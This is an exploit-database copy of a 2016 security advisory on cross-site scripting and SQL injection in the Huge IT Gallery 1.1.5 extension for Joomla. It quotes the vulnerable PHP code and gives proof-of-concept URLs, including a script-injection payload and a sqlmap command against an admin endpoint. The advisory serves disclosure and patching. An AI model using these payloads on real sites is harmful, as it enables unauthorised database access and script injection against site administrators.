Advertisement






Joomla Huge IT Gallery 1.1.5 Cross Site Scripting / SQL Injection

CVE Category Price Severity
CVE-2016-1000113 CWE-89 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2016-07-26
CPE
cpe:cpe:/a:joomla:huge_it_gallery:1.1.5
CVSS EPSS EPSSP
CVSS:3.1/ 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016070191

Below is a copy:

Joomla Huge IT Gallery 1.1.5 Cross Site Scripting / SQL InjectionTitle: XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Fixed: v1.1.7
Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva
Date: 2016-07-14
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro
Vendor: huge-it.com
Vendor Notified: 2016-07-15, fixed 2016-07-23
Vendor Contact: [email protected]
Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links.
Vulnerability:
The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability:

SQL in code via id parameter:
./administrator/components/com_gallery/models/gallery.php
51 public function getPropertie() {
52 $db = JFactory::getDBO();
53 $id_cat = JRequest::getVar('id');
54 $query = $db->getQuery(true);
55 $query->select('#__huge_itgallery_images.name as name,'
56 . '#__huge_itgallery_images.id ,'
57 . '#__huge_itgallery_gallerys.name as portName,'
58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg allery_images'));
60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);
61 $query->order('ordering desc');
62 
64 $db->setQuery($query);
65 $results = $db->loadObjectList();
66 return $results;
67 }



XSS is here:

root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo $_GET" {} ;
./administrator/components/com_gallery/views/gallery/tmpl/default.php
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo $_GET" {} ;
256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" >
CVE Assignments:A CVE-2016-1000113 XSS,A CVE-2016-1000114 SQL Injection
JSON: Export
Exploit Code:
XSS PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E

SQLi PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE

$ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql
Screen Shots:
Advisory:A http://www.vapidlabs.com/advisory.php?v=164


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.